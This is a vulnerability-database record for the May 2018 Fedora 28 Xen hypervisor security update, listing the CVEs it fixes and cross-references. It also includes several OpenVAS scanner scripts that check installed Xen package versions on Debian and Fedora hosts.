{"id": "FEDORA:3FBD8604970A", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-2.fc28", "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "published": "2018-05-12T18:23:12", "modified": "2018-05-12T18:23:12", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-8897"], "lastseen": "2020-12-21T08:17:54", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310874755", "OPENVAS:1361412562310874763", "OPENVAS:1361412562310875010", "OPENVAS:1361412562310874540", "OPENVAS:1361412562310891383", "OPENVAS:1361412562310875255", "OPENVAS:1361412562310874611", "OPENVAS:1361412562310704201", "OPENVAS:1361412562310851773", "OPENVAS:1361412562310851742"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1383-1:AD0A7", "DEBIAN:DLA-1559-1:6EBBD", "DEBIAN:DSA-4201-1:7E613"]}, {"type": "nessus", "idList": ["FEDORA_2018-604574C943.NASL", "FEDORA_2018-EB69078020.NASL", "DEBIAN_DLA-1383.NASL", "FEDORA_2018-98684F429B.NASL", "SUSE_SU-2018-1216-1.NASL", "FEDORA_2018-DBEBCA30D0.NASL", "DEBIAN_DSA-4201.NASL", "FEDORA_2018-7CD077DDD3.NASL", "SUSE_SU-2018-3230-1.NASL", "FEDORA_2018-A7AC26523D.NASL"]}, {"type": "cve", "idList": ["CVE-2018-10981", "CVE-2018-10982", "CVE-2018-10471", "CVE-2018-8897", "CVE-2018-10472"]}, {"type": "fedora", "idList": ["FEDORA:6CE076015F62", "FEDORA:E5291607602A", "FEDORA:6A9A16095B29", "FEDORA:5267F604C2BD", "FEDORA:37B8362B00D0", "FEDORA:6E66862A5C82"]}, {"type": "f5", "idList": ["F5:K17403481"]}, {"type": "suse", "idList": ["SUSE-SU-2018:1203-1", "SUSE-SU-2018:1177-1", "OPENSUSE-SU-2018:1274-1", "SUSE-SU-2018:1202-1", "SUSE-SU-2018:1184-1", "SUSE-SU-2018:1216-1", "SUSE-SU-2018:1181-1", "OPENSUSE-SU-2018:1487-1"]}, {"type": "symantec", "idList": ["SMNTC-104071"]}, {"type": "citrix", "idList": ["CTX234679"]}, {"type": "gentoo", "idList": ["GLSA-201810-06"]}, {"type": "zdt", "idList": ["1337DAY-ID-30427", "1337DAY-ID-30720"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4097", "ELSA-2018-4096", "ELSA-2018-4219", "ELSA-2018-4098"]}, {"type": "exploitdb", "idList": ["EDB-ID:45024", "EDB-ID:44697"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190921-01-DEBUG", "HUAWEI-SA-20181010-01-DEBUG"]}, {"type": "cert", "idList": ["VU:631579"]}, {"type": "xen", "idList": ["XSA-260"]}, {"type": "threatpost", "idList": ["THREATPOST:1C410BC5122B196A58BBDDCDA7A79983"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/MOV_SS"]}, {"type": "redhat", "idList": ["RHSA-2018:1352", "RHSA-2018:1351", "RHSA-2018:1353"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F4489E070E6CDADA18DE546A030227F0"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:12D0AED8A6507BA497CB8CC165A00D0A"]}, {"type": "cisa", "idList": ["CISA:C1D0E305B2191ADE13845CF38D356802"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148549"]}, {"type": "freebsd", "idList": ["521CE804-52FD-11E8-9123-A4BADB2F4699"]}], "modified": "2020-12-21T08:17:54", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2020-12-21T08:17:54", "rev": 2}, "vulnersScore": 6.6}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "28", "arch": "any", "packageName": "xen", "packageVersion": "4.10.1", "packageFilename": "UNKNOWN", "operator": "lt"}]}

{"openvas": [{"lastseen": "2019-07-04T18:56:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-8897\nAndy Lutomirski and Nick Peterson discovered that incorrect handling\nof debug exceptions could result in privilege escalation.\n\nCVE-2018-10471\nAn error was discovered in the mitigations against Meltdown which\ncould result in denial of service.\n\nCVE-2018-10472\nAnthony Perard discovered that incorrect parsing of CDROM images\ncan result in information disclosure.\n\nCVE-2018-10981\nJan Beulich discovered that malformed device models could result\nin denial of service.\n\nCVE-2018-10982\nRoger Pau Monne discovered that incorrect handling of high precision\nevent timers could result in denial of service and potentially\nprivilege escalation.", "modified": "2019-07-04T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310704201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704201", "type": "openvas", "title": "Debian Security Advisory DSA 4201-1 (xen - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4201-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704201\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_name(\"Debian Security Advisory DSA 4201-1 (xen - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 00:00:00 +0200 (Tue, 15 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4201.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"xen on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6.\n\nWe recommend that you upgrade your xen packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/xen\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-8897\nAndy Lutomirski and Nick Peterson discovered that incorrect handling\nof debug exceptions could result in privilege escalation.\n\nCVE-2018-10471\nAn error was discovered in the mitigations against Meltdown which\ncould result in denial of service.\n\nCVE-2018-10472\nAnthony Perard discovered that incorrect parsing of CDROM images\ncan result in information disclosure.\n\nCVE-2018-10981\nJan Beulich discovered that malformed device models could result\nin denial of service.\n\nCVE-2018-10982\nRoger Pau Monne discovered that incorrect handling of high precision\nevent timers could result in denial of service and potentially\nprivilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\n# nb: Note that the initial DSA-4201-1 is stating that \"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\" is fixing this which is currently wrong.\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-4.8\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.8-amd64\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-amd64\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-4.8\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-common\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-16T00:00:00", "id": "OPENVAS:1361412562310874540", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874540", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-a7ac26523d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_a7ac26523d_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-a7ac26523d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874540\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-16 06:05:11 +0200 (Wed, 16 May 2018)\");\n script_cve_id(\"CVE-2018-8897\", \"CVE-2018-10472\", \"CVE-2018-10471\", \"CVE-2018-10982\",\n \"CVE-2018-10981\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-a7ac26523d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-a7ac26523d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TSWYUDN5DYYW6RZXFYCOECLV6F26JJRM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-27T00:00:00", "id": "OPENVAS:1361412562310874611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874611", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-5521156807", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_5521156807_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-5521156807\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874611\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-27 05:52:53 +0200 (Sun, 27 May 2018)\");\n script_cve_id(\"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\", \"CVE-2018-10981\",\n \"CVE-2018-10472\", \"CVE-2018-10471\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-5521156807\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-5521156807\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C7X7HOMV5LPDSELNUPIPYQTIPFBGJEJQ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~3.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-3665", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-30T00:00:00", "id": "OPENVAS:1361412562310874755", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874755", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-d3cb6f113c", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d3cb6f113c_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-d3cb6f113c\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874755\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-30 06:02:58 +0200 (Sat, 30 Jun 2018)\");\n script_cve_id(\"CVE-2018-3665\", \"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\",\n \"CVE-2018-10981\", \"CVE-2018-10472\", \"CVE-2018-10471\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-d3cb6f113c\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d3cb6f113c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ALMLZ3SKTV3RRHYNXOE5J7YVGWZZ2O4C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~4.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:10:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.", "modified": "2020-01-29T00:00:00", "published": "2018-05-28T00:00:00", "id": "OPENVAS:1361412562310891383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891383", "type": "openvas", "title": "Debian LTS: Security Advisory for xen (DLA-1383-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891383\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_name(\"Debian LTS: Security Advisory for xen (DLA-1383-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-28 00:00:00 +0200 (Mon, 28 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/05/msg00015.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"xen on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.1.6.lts1-14.\n\nWe recommend that you upgrade your xen packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-4.1\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-ocaml\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-ocaml-dev\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-docs-4.1\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.1-amd64\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.1-i386\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-amd64\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-i386\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-4.1\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-common\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-3665", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-07-05T00:00:00", "id": "OPENVAS:1361412562310874763", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874763", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-a7862a75f5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_a7862a75f5_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-a7862a75f5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874763\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-05 06:11:55 +0200 (Thu, 05 Jul 2018)\");\n script_cve_id(\"CVE-2018-12891\", \"CVE-2018-12893\", \"CVE-2018-12892\", \"CVE-2018-3665\",\n \"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\", \"CVE-2018-10981\",\n \"CVE-2018-10472\", \"CVE-2018-10471\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-a7862a75f5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-a7862a75f5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AMJHHOEWJUENZ5JJ3RBMCVUWTYYF4GDE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 